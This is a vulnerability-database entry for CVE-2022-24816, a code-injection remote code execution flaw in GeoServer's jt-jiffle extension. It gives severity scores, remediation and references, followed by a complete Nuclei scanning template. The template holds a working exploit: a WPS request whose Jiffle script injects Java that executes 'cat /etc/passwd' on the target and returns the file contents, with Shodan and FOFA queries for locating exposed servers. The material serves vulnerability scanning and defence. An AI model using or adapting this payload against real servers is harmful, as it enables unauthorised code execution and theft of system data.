History: Dec 30, 2022 - 8:27 a.m.

GeoServer <1.2.2 - Remote Code Execution

2022-12-30 08:27:33
ProjectDiscovery
github.com
cve
cve2022
geoserver
rce
geosolutionsgroup
codeexecution
java

CVSS2: 7.5 High
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3: 10 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: CHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

AI Score: 9.8 High
Confidence: High

EPSS: 0.967 High
Percentile: 99.7%

Programs run on GeoServer before 1.2.2 which use jt-jiffle and allow Jiffle script to be provided via network request are susceptible to remote code execution. The Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects downstream GeoServer 1.1.22.
id: CVE-2022-24816

info:
  name: GeoServer <1.2.2 - Remote Code Execution
  author: mukundbhuva
  severity: critical
  description: |
    Programs run on GeoServer before 1.2.2 which use jt-jiffle and allow Jiffle script to be provided via network request are susceptible to remote code execution. The Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects downstream GeoServer 1.1.22.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
  remediation: 1.2.22 contains a patch that disables the ability to inject malicious code into the resulting script. Users unable to upgrade may negate the ability to compile Jiffle scripts from the final application by removing janino-x.y.z.jar from the classpath.
  reference:
    - https://www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver.html
    - https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx
    - https://github.com/geosolutions-it/jai-ext/commit/cb1d6565d38954676b0a366da4f965fef38da1cb
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24816
    - https://github.com/tanjiti/sec_profile
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24816
    cwe-id: CWE-94
    epss-score: 0.86265
    epss-percentile: 0.98506
    cpe: cpe:2.3:a:geosolutionsgroup:jai-ext:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: geosolutionsgroup
    product: jai-ext
    shodan-query: /geoserver/
    fofa-query:
      - app="GeoServer"
      - app="geoserver"
  tags: cve,cve2022,geoserver,rce,geosolutionsgroup

http:
  - raw:
      - |
        POST /geoserver/wms HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0" encoding="UTF-8"?>
          <wps:Execute version="1.0.0" service="WPS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.opengis.net/wps/1.0.0" xmlns:wfs="http://www.opengis.net/wfs" xmlns:wps="http://www.opengis.net/wps/1.0.0" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:gml="http://www.opengis.net/gml" xmlns:ogc="http://www.opengis.net/ogc" xmlns:wcs="http://www.opengis.net/wcs/1.1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
            <ows:Identifier>ras:Jiffle</ows:Identifier>
            <wps:DataInputs>
              <wps:Input>
                <ows:Identifier>coverage</ows:Identifier>
                <wps:Data>
                  <wps:ComplexData mimeType="application/arcgrid"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999  316]]></wps:ComplexData>
                </wps:Data>
              </wps:Input>
              <wps:Input>
                <ows:Identifier>script</ows:Identifier>
                <wps:Data>
                  <wps:LiteralData>dest = y() - (500); // */ public class Double {    public static double NaN = 0;  static { try {  java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cat /etc/passwd").getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>
                </wps:Data>
              </wps:Input>
              <wps:Input>
                <ows:Identifier>outputType</ows:Identifier>
                <wps:Data>
                  <wps:LiteralData>DOUBLE</wps:LiteralData>
                </wps:Data>
              </wps:Input>
            </wps:DataInputs>
            <wps:ResponseForm>
              <wps:RawDataOutput mimeType="image/tiff">
                <ows:Identifier>result</ows:Identifier>
              </wps:RawDataOutput>
            </wps:ResponseForm>
          </wps:Execute>

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "ExceptionInInitializerError"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022076ce5c262b52d57466f3af023a28399c27dd8a0a2af7b210a24268a853de1ca00220187c683fede76e3625142f084c4ea680c65454438ff7186f71bbab5027937147:922c64590222798bb761d5b6d8e72950
